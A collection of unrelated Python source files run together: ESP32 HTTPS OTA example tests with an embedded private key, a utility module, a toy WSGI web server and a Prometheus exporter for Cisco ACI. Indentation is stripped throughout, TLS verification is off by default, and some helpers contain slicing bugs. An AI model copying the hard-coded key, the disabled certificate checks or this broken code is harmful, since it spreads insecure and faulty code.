"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8001))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + bin_name))
dut1.write("https://" + host_ip + ":8001/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8001/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8001/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Random binary file to be generated
random_bin_name = "random.bin"
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + random_bin_name))
dut1.write("https://" + host_ip + ":8001/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
common.py
|
# -*- coding: utf-8 -*-
import json, subprocess, threading, sys, platform, os
PY3 = sys.version_info[0] == 3
JsonLoads = PY3 and json.loads or (lambda s: encJson(json.loads(s)))
JsonDumps = json.dumps
def STR2BYTES(s):
return s.encode('utf8') if PY3 else s
def BYTES2STR(b):
return b.decode('utf8') if PY3 else b
def BYTES2SYSTEMSTR(b):
return b.decode('utf8') if PY3 else \
b.decode('utf8').encode(sys.stdin.encoding)
def STR2SYSTEMSTR(s):
return s if PY3 else s.decode('utf8').encode(sys.stdin.encoding)
#def STRING_ESCAPE(s):
# if not PY3:
# return s.decode('string-escape')
# else:
# return s.encode('utf8').decode('unicode_escape')
if not PY3:
def encJson(obj):
if hasattr(obj, 'encode'):
return obj.encode('utf8')
elif isinstance(obj, list):
return [encJson(e) for e in obj]
elif isinstance(obj, dict):
return dict((encJson(k), encJson(v)) for k,v in obj.items())
else:
return obj
'''
def Partition(msg, n):
n = n * 3
if n >= len(msg):
return msg, ''
else:
# All utf8 characters start with '0xxx-xxxx' or '11xx-xxxx'
while n > 0 and ord(msg[n]) >> 6 == 2:
n -= 1
return msg[:n], msg[n:]
'''
def isSpace(b):
return b in [' ', '\t', '\n', '\r', 32, 9, 10, 13]
def Partition(msg):
if PY3:
msg = msg.encode('utf8')
n = 720
if len(msg) < n:
f, b = msg, b''
else:
for i in range(n-1, n-101, -1):
if isSpace(msg[i]):
f, b = msg[:i], msg[i:]
break
else:
f, b = msg[:n], msg[n:]
if PY3:
return f.decode('utf8'), b.decode('utf8')
else:
return f, b
#_p = re.compile(r'[0-9]+|[a-zA-Z][a-z]*')
#
#def SplitWords(s):
# return _p.findall(s)
#
#def MinusSeperate(s):
# return '-'.join(SplitWords(s)).lower()
def HasCommand(procName):
return subprocess.call(['which', procName], stdout=subprocess.PIPE) == 0
#def StartThread(target, *args, **kwargs):
# threading.Thread(target=target, args=args, kwargs=kwargs).start()
def StartDaemonThread(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class LockedValue(object):
def __init__(self, initialVal=None):
self.val = initialVal
self.lock = threading.Lock()
def setVal(self, val):
with self.lock:
self.val = val
def getVal(self):
with self.lock:
val = self.val
return val
# usage: CallInNewConsole(['python', 'qterm.py'])
def CallInNewConsole(args=None):
args = sys.argv[1:] if args is None else args
if not args:
return 1
osName = platform.system()
if osName == 'Windows':
return subprocess.call(['start'] + list(args), shell=True)
elif osName == 'Linux':
cmd = subprocess.list2cmdline(args)
if HasCommand('mate-terminal'):
args = ['mate-terminal', '-e', cmd]
elif HasCommand('gnome-terminal'):
args = ['gnome-terminal', '-e', cmd]
elif HasCommand('xterm'):
args = ['sh', '-c', 'xterm -e %s &' % cmd]
else:
return 1
# args = ['sh', '-c', 'nohup %s >/dev/null 2>&1 &' % cmd]
return subprocess.call(args, preexec_fn=os.setpgrp)
elif osName == 'Darwin':
return subprocess.call(['open','-W','-a','Terminal.app'] + list(args))
else:
return 1
# return subprocess.Popen(list(args) + ['&'])
if PY3:
import queue as Queue
else:
import Queue
class DotDict(object):
def __init__(self, **kw):
self.__dict__.update(**kw)
Pass = lambda *arg, **kwargs: None
def LeftTrim(s, head):
if s.startswith(head):
return s[:len(head)]
else:
return s
def AutoTest():
with open(sys.argv[1], 'rb') as f:
for line in f.read().split(b'\n'):
line = BYTES2SYSTEMSTR(line.strip())
if not line:
continue
elif line.startswith('#'):
print(line)
else:
print('>>> '+line)
os.system(line)
sys.stdout.write('\npress enter to continue...')
if PY3:
input()
else:
raw_input()
sys.stdout.write('\n')
if not PY3:
import HTMLParser; htmlUnescape = HTMLParser.HTMLParser().unescape
def HTMLUnescape(s):
s = s.replace(' ', ' ')
return htmlUnescape(s.decode('utf8')).encode('utf8')
else:
import html.parser; htmlUnescape = html.parser.HTMLParser().unescape
def HTMLUnescape(s):
return htmlUnescape(s.replace(' ', ' '))
def IsMainThread():
return threading.current_thread().name == 'MainThread'
if PY3:
import importlib
reload = importlib.reload
# import module / import package.module
# Import('module') / Import('package.module')
def Import(moduleName):
if moduleName in sys.modules:
reload(sys.modules[moduleName])
else:
__import__(moduleName)
return sys.modules[moduleName]
if not PY3:
import urllib
Unquote = urllib.unquote
else:
import urllib.parse
Unquote = urllib.parse.unquote
|
MyWebServer.py
|
# coding:utf-8
import socket
import re
import sys
from multiprocessing import Process
from MyWebFramework import Application
# 设置静态文件根目录
HTML_ROOT_DIR = "./html"
WSGI_PYTHON_DIR = "./wsgipython"
class HTTPServer(object):
""""""
def __init__(self, application):
"""构造函数, application指的是框架的app"""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.app = application
def start(self):
self.server_socket.listen(128)
while True:
client_socket, client_address = self.server_socket.accept()
# print("[%s, %s]用户连接上了" % (client_address[0],client_address[1]))
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Process(target=self.handle_client, args=(client_socket,))
handle_client_process.start()
client_socket.close()
def start_response(self, status, headers):
"""
status = "200 OK"
headers = [
("Content-Type", "text/plain")
]
star
"""
response_headers = "HTTP/1.1 " + status + "\r\n"
for header in headers:
response_headers += "%s: %s\r\n" % header
self.response_headers = response_headers
def handle_client(self, client_socket):
"""处理客户端请求"""
# 获取客户端请求数据
request_data = client_socket.recv(1024)
print("request data:", request_data)
request_lines = request_data.splitlines()
for line in request_lines:
print(line)
# 解析请求报文
# 'GET / HTTP/1.1'
request_start_line = request_lines[0]
# 提取用户请求的文件名
print("*" * 10)
print(request_start_line.decode("utf-8"))
file_name = re.match(r"\w+ +(/[^ ]*) ", request_start_line.decode("utf-8")).group(1)
method = re.match(r"(\w+) +/[^ ]* ", request_start_line.decode("utf-8")).group(1)
env = {
"PATH_INFO": file_name,
"METHOD": method
}
response_body = self.app(env, self.start_response)
response = self.response_headers + "\r\n" + response_body
# 向客户端返回响应数据
client_socket.send(bytes(response, "utf-8"))
# 关闭客户端连接
client_socket.close()
def bind(self, port):
self.server_socket.bind(("", port))
def main():
sys.path.insert(1, WSGI_PYTHON_DIR)
if len(sys.argv) < 2:
sys.exit("python MyWebServer.py Module:app")
# python MyWebServer.py MyWebFrameWork:app
module_name, app_name = sys.argv[1].split(":")
# module_name = "MyWebFrameWork"
# app_name = "app"
m = __import__(module_name)
app = getattr(m, app_name)
http_server = HTTPServer(app)
# http_server.set_port
http_server.bind(8000)
http_server.start()
if __name__ == "__main__":
main()
|
prometheus_aci_exporter.py
|
#!/usr/bin/env python3
import argparse
from http.server import BaseHTTPRequestHandler, HTTPServer
from itertools import chain
import logging
import re
import signal
from socketserver import ThreadingMixIn
from threading import Thread
import time
from typing import Any, Callable, Dict, Iterable, List, Optional, Pattern, Union
import urllib.parse as up
import requests
import yaml
RealNumber = Union[int, float]
JsonType = Union[None, str, int, float, bool, List['JsonType'], Dict[str, 'JsonType']]
DEFAULT_PORT = 9377
DEFAULT_TIMEOUT = 10
APIC_COOKIE_NAME = "APIC-cookie"
PROM_METRIC_NAME_RE = re.compile("^[a-zA-Z_:][a-zA-Z0-9_:]*$")
PROM_LABEL_NAME_RE = re.compile("^[a-zA-Z_][a-zA-Z0-9_]*$")
LOGGER = logging.getLogger("prometheus_aci_exporter")
class Metric:
def __init__(self, metric_name, metric_type, help_text=None, label_keys=None):
if label_keys is None:
label_keys = ()
if PROM_METRIC_NAME_RE.match(metric_name) is None:
raise ValueError(f"invalid metric_name {metric_name!r} (must match {PROM_METRIC_NAME_RE.pattern!r})")
for key in label_keys:
if PROM_LABEL_NAME_RE.match(key) is None:
raise ValueError(f"invalid entry {key!r} in label_keys (must match {PROM_LABEL_NAME_RE.pattern!r})")
self.metric_name = metric_name
self.metric_type = metric_type
self.help_text = help_text
self.label_keys = tuple(label_keys)
self.unit = None
self._values = []
def add_value(self, value, label_values=None, timestamp=None):
# timestamp: seconds since Unix epoch (or None)
if label_values is None:
label_values = ()
label_values = tuple(label_values)
if len(label_values) != len(self.label_keys):
raise ValueError(f"len(label_values) ({len(label_values)}) does not equal len(self.label_keys) ({len(self.label_keys)})")
self._values.append((value, timestamp, label_values))
@staticmethod
def sanitize_help_text(help_text):
return help_text.replace("\\", "\\\\").replace("\n", "\\n")
@staticmethod
def escape_label_value(lbl_val):
ret = []
for c in lbl_val:
if c == '\\':
ret.append('\\\\')
elif c == '"':
ret.append('\\"')
elif c == '\n':
ret.append('\\n')
else:
ret.append(c)
return "".join(ret)
@staticmethod
def quote_label_value(lbl_val):
return f'"{Metric.escape_label_value(lbl_val)}"'
def generate(self, fmt='prometheus'):
if fmt not in ('prometheus', 'openmetrics'):
raise ValueError(f"unknown format: {fmt!r}")
lines = []
metric_type = (
self.metric_type
if self.metric_type in ("counter", "gauge", "histogram", "summary")
else "untyped"
)
metric_name, metric_name_tail = self.metric_name, ""
if metric_type == 'counter' and fmt != 'prometheus':
if metric_name.endswith("_total"):
metric_name = metric_name[:len("_total")]
metric_name_tail = "_total"
lines.append(f"# TYPE {metric_name} {metric_type}")
if self.help_text is not None:
if fmt == 'prometheus':
help_text_sanitized = self.help_text.replace("\\", "\\\\").replace("\n", "\\n")
else:
help_text_sanitized = Metric.escape_label_value(self.help_text)
lines.append(f"# HELP {metric_name} {help_text_sanitized}")
if self.unit is not None and fmt != 'prometheus':
lines.append(f"# UNIT {metric_name} {self.unit}")
for val, tstamp, lbl_vals in self._values:
ob, cb = '{', '}'
line_pieces = [metric_name, metric_name_tail]
lbl_kvps = [
f"{k}={Metric.quote_label_value(v)}"
for (k, v)
in sorted(zip(self.label_keys, lbl_vals))
]
if lbl_kvps:
line_pieces.append(f"{ob}{','.join(lbl_kvps)}{cb}")
line_pieces.append(f" {val}")
if tstamp is not None:
if fmt == 'prometheus':
# milliseconds instead of seconds
tstamp *= 1000
line_pieces.append(f" {tstamp}")
lines.append("".join(line_pieces))
return "".join(f"{ln}\n" for ln in lines)
class AciSession(object):
def __init__(self, controller: str) -> None:
self.controller: str = controller
self.timeout: RealNumber = DEFAULT_TIMEOUT
self.auth_user: Optional[str] = None
self.auth_token: Optional[str] = None
self.tls_verify: Union[str, bool] = False
def auth(self, auth_config: Dict[str, JsonType]) -> None:
# TODO: certificate auth
controller_ca_cert = auth_config.get('controller_ca_cert', None)
if controller_ca_cert is not None:
self.tls_verify = controller_ca_cert
auth_payload = {
"aaaUser": {
"attributes": {
"name": auth_config['username'],
"pwd": auth_config['password']
}
}
}
response = requests.post(
f"https://{self.controller}/api/aaaLogin.json",
json=auth_payload,
timeout=self.timeout,
verify=self.tls_verify
)
response.raise_for_status()
self.auth_user = auth_config['username']
self.auth_token = response.cookies[APIC_COOKIE_NAME]
def logout(self) -> None:
if self.auth_user is None:
return
logout_payload = {
"aaaUser": {
"attributes": {
"name": self.auth_user,
}
}
}
response = requests.post(
f"https://{self.controller}/api/aaaLogout.json",
json=logout_payload,
cookies={APIC_COOKIE_NAME: self.auth_token},
timeout=self.timeout,
verify=self.tls_verify,
)
response.raise_for_status()
self.auth_user = None
self.auth_token = None
def obtain_instances(
self, class_name: str, filter_string: Optional[str] = None,
scope: str = "self"
) -> Dict[str, JsonType]:
escaped_class = up.quote(class_name)
query_options = {
"query-target": scope,
}
if filter_string is not None:
query_options['query-target-filter'] = filter_string
response = requests.get(
f"https://{self.controller}/api/class/{escaped_class}.json",
params=query_options,
cookies={APIC_COOKIE_NAME: self.auth_token},
timeout=self.timeout,
verify=self.tls_verify
)
response.raise_for_status()
return response.json()
class AciCollector(object):
def __init__(self, config: Dict[str, JsonType]) -> None:
self.config: Dict[str, JsonType] = config
self.pending_config: Optional[Dict[str, JsonType]] = None
self.timeout: RealNumber = DEFAULT_TIMEOUT
self.regex_cache: Dict[str, Pattern] = {}
def collect(self) -> Iterable[Metric]:
if self.pending_config is not None:
self.config = self.pending_config
self.pending_config = None
scrape_duration_metric = Metric(
'aci_scrape_duration_seconds',
'gauge',
'The duration, in seconds, of the last scrape of the fabric.',
label_keys=('fabric',)
)
common_queries = self.config.get('common_queries', dict())
for fabric_name, fabric in self.config['fabrics'].items():
time_start = time.perf_counter()
# try each controller in turn
working_index = None
for i, controller in enumerate(fabric['controllers']):
try:
yield from self.collect_fabric(fabric_name, fabric, controller, common_queries)
working_index = i
break
except requests.exceptions.Timeout:
# try the next controller
pass
time_end = time.perf_counter()
# reorder controllers?
if working_index is not None and working_index > 0:
# yes
cur_ctrls = fabric['controllers']
fabric['controllers'] = cur_ctrls[working_index:] + cur_ctrls[:working_index]
# note that the order is reset when the configuration is reloaded (e.g. SIGHUP)
scrape_duration_metric.add_value(time_end - time_start, (fabric_name,))
yield scrape_duration_metric
def collect_fabric(
self, fabric_name: str, fabric: Dict[str, JsonType], controller: str,
common_queries: Dict[str, JsonType]
) -> Iterable[Metric]:
session = AciSession(controller)
session.auth(fabric['auth'])
all_queries = chain(
fabric.get('queries', dict()).items(),
common_queries.items()
)
for query_name, query in all_queries:
LOGGER.debug("processing query %r", query_name)
class_name = query['class_name']
scope = query.get('scope', 'self')
filter_string = query.get('filter', None)
LOGGER.debug("class %r, scope %r, filter %r", class_name, scope, filter_string)
instances = session.obtain_instances(class_name, filter_string, scope)
LOGGER.debug("obtained %d instances", len(instances))
metric_definitions = {}
count_metric = query.get('count_metric', None)
if count_metric is not None:
LOGGER.debug("count metric (%r) defined", count_metric)
count_labels = {}
self._add_common_labels(count_labels, query, query_name, fabric_name, class_name)
count_help_text = query.get('count_metric_help_text', '')
# instance counts are always gauges
count_metric_object = Metric(
count_metric, 'gauge', count_help_text, label_keys=count_labels.keys()
)
count_metric_object.add_value(len(instances['imdata']), count_labels.values())
metric_definitions[count_metric] = count_metric_object
all_values_labels = []
for instance in instances['imdata']:
drop_instance = False
class_name = list(instance.keys())[0]
attributes = instance[class_name]['attributes']
LOGGER.debug("processing instance of class %r with DN %r", class_name, attributes['dn'])
# handle indexing
index_mode = query.get('index_mode', 'none')
index_label = query.get('index_label', None)
if index_mode == 'none':
indexes_prop_suffixes = [(-1, "")]
else:
index_max = int(attributes[query['index_max_property']])
if index_mode == 'zero_based':
indexes_prop_suffixes = [(i, f"{i}") for i in range(index_max)]
elif index_mode == 'zero_based_first_nothing':
indexes_prop_suffixes = [(i, f"{i}" if i > 0 else "") for i in range(index_max)]
elif index_mode == 'one_based':
indexes_prop_suffixes = [(i+1, f"{i+1}") for i in range(index_max)]
elif index_mode == 'one_based_first_nothing':
indexes_prop_suffixes = [(i+1, f"{i+1}" if i > 0 else "") for i in range(index_max)]
else:
raise ValueError(f"unknown index mode {index_mode!r}")
for index, prop_suffix in indexes_prop_suffixes:
LOGGER.debug("indexing: index %d, suffix %r", index, prop_suffix)
labels = {}
self._add_common_labels(labels, query, query_name, fabric_name, class_name)
for label_definition in query.get('labels', list()):
LOGGER.debug(
"processing label definition %r for attributes %r",
label_definition,
attributes,
)
updated_labels = self.process_value(attributes, label_definition)
LOGGER.debug("updated labels are %r", updated_labels)
if updated_labels is None:
drop_instance = True
break
try:
labels.update(updated_labels)
except ValueError as ex:
raise ValueError(f"failed to update labels in query {query_name!r} with {updated_labels!r}: {ex}")
if index_label is not None:
LOGGER.debug("adding index label %r=%d", index_label, index)
labels[index_label] = str(index)
if drop_instance:
LOGGER.debug("dropping instance after labels")
continue
values = {}
for value_definition in query.get('metrics', list()):
# extract the definition
metric_name = value_definition['key']
metric_type = value_definition['type']
help_text = value_definition.get('help_text', '')
metric_object = Metric(
metric_name, metric_type, help_text,
label_keys=labels.keys()
)
metric_definitions[metric_name] = metric_object
# store the value
LOGGER.debug(
"processing value definition %r for attributes %r and prop suffix %r",
value_definition,
attributes,
prop_suffix,
)
value = self.process_value(attributes, value_definition, prop_suffix)
LOGGER.debug("value is %r", value)
if value is None:
drop_instance = True
break
try:
values.update(value)
except ValueError as ex:
raise ValueError(f"failed to update values for metric {metric_name!r} in query {query_name!r} with {value!r}: {ex}")
if drop_instance:
LOGGER.debug("dropping instance after value")
continue
all_values_labels.append((values, labels))
if not all_values_labels:
continue
for values, labels in all_values_labels:
for key, value in values.items():
metric_object = metric_definitions[key]
metric_object.add_value(float(value), labels.values())
for metric_object in metric_definitions.values():
yield metric_object
session.logout()
@staticmethod
def _add_common_labels(
labels: Dict[str, str], query: Dict[str, JsonType],
query_name: str, fabric_name: str, class_name: str
) -> None:
if not query.get('omit_query_name_label', False):
labels['queryName'] = query_name
if not query.get('omit_fabric_label', False):
labels['fabric'] = fabric_name
if not query.get('omit_class_name_label', False):
labels['className'] = class_name
def process_value(
self, attributes: Dict[str, JsonType], definition: Dict[str, JsonType],
property_name_suffix: str = ""
) -> JsonType:
property_name = definition['property_name'] + property_name_suffix
const_value = definition.get('const_value', None)
if const_value is not None:
property_value = const_value
else:
property_value = attributes.get(property_name, None)
if property_value is None:
return None
# transformations?
# type conversion
type_key = definition.get('value_type', None)
if type_key is not None:
type_func = {
'str': str,
'int': int,
'float': float,
}.get(type_key, None)
if type_func is None:
raise ValueError(f"unknown type conversion function {type_func!r}")
property_value = type_func(property_value)
# range validity
invalid_below = definition.get('invalid_below', None)
clamp_bottom = definition.get('clamp_bottom', None)
if invalid_below is not None:
# convert property_value to the type of invalid_below before comparing
if type(invalid_below)(property_value) < invalid_below:
return None
elif clamp_bottom is not None:
if type(clamp_bottom)(property_value) < clamp_bottom:
property_value = clamp_bottom
invalid_above = definition.get('invalid_above', None)
clamp_top = definition.get('clamp_top', None)
if invalid_above is not None:
if type(invalid_above)(property_value) > invalid_above:
return None
if clamp_top is not None:
if type(clamp_top)(property_value) > clamp_top:
property_value = clamp_top
# regex extraction
regex_str = definition.get('regex', None)
regex_must_match = definition.get('regex_must_match', False)
if regex_str is not None:
try:
regex = self.regex_cache[regex_str]
except KeyError:
regex = re.compile(regex_str)
self.regex_cache[regex_str] = regex
match = regex.match(property_value)
if match is not None:
match_dict = match.groupdict()
property_value = {k: v if v is not None else "" for (k, v) in match_dict.items()}
elif regex_must_match:
# it didn't match, though
return None
# key renaming
key_renaming = definition.get('key_renaming', None)
if key_renaming is not None:
new_values = {}
for old_key, value in property_value.items():
new_key = key_renaming.get(old_key, old_key)
if new_key is None:
# skip this value
continue
new_values[new_key] = value
property_value = new_values
# select-case
cases = definition.get('cases', None)
if cases is not None:
for old_value, new_value in cases.items():
if property_value == old_value:
property_value = new_value
break
# key attachment (dictionarification)
key = definition.get('key', None)
if key is not None:
property_value = {key: property_value}
return property_value
def load_config(config_file_name: str) -> JsonType:
with open(config_file_name, "r", encoding="utf-8") as config_file:
return yaml.safe_load(config_file)
def get_sighup_handler(
aci_collector: AciCollector, config_file_name: str
) -> Callable[[Any, Any], None]:
def handle_sighup(_signal_number, _stack_frame) -> None:
config = load_config(config_file_name)
aci_collector.pending_config = config
return handle_sighup
class MetricsHandler(BaseHTTPRequestHandler):
collector = None
args = None
def do_GET(self):
output_format = 'prometheus'
if getattr(self.args, 'web_openmetrics', False):
accept_header = self.headers.get('Accept', '')
for accepted_type in accept_header.split(','):
if accepted_type.split(';')[0].strip() == 'application/openmetrics-text':
output_format = 'openmetrics'
collector = self.collector
generated_lines = [
metric.generate(fmt=output_format).encode('utf-8')
for metric
in collector.collect()
]
self.send_response(200)
if output_format == 'prometheus':
self.send_header('Content-Type', 'text/plain; version=0.0.4; charset=utf-8')
else:
self.send_header('Content-Type', 'application/openmetrics-text; version=0.0.1; charset=utf-8')
self.end_headers()
for line in generated_lines:
# lines are already terminated appropriately
self.wfile.write(line)
if output_format != 'prometheus':
self.wfile.write(b'# EOF\n')
def log_message(self, format, *args):
return
@classmethod
def factory(cls, collector, args):
cls_name = str(cls.__name__)
CustomizedMetricsHandler = type(
cls_name,
(cls, object),
{"collector": collector, "args": args}
)
return CustomizedMetricsHandler
class ThreadingSimpleHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
def start_http_server(collector, port, addr='', args=None):
CustomMetricsHandler = MetricsHandler.factory(collector, args)
server = ThreadingSimpleHTTPServer((addr, port), CustomMetricsHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
LOGGER.info("listening on %s:%d", addr, port)
def main() -> None:
parser = argparse.ArgumentParser()
parser.add_argument("--config.file", dest="config_file", default="aci.yml")
parser.add_argument("--web.listen-port", dest="web_listen_port", type=int, default=DEFAULT_PORT)
parser.add_argument("--web.listen-address", dest="web_listen_address", type=str, default="")
parser.add_argument("--web.openmetrics", dest="web_openmetrics", action="store_true")
parser.add_argument(
"--log.level", dest="log_level",
choices=("DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"),
default="INFO",
)
args = parser.parse_args()
log_level = getattr(logging, args.log_level)
logging.basicConfig(
level=log_level,
)
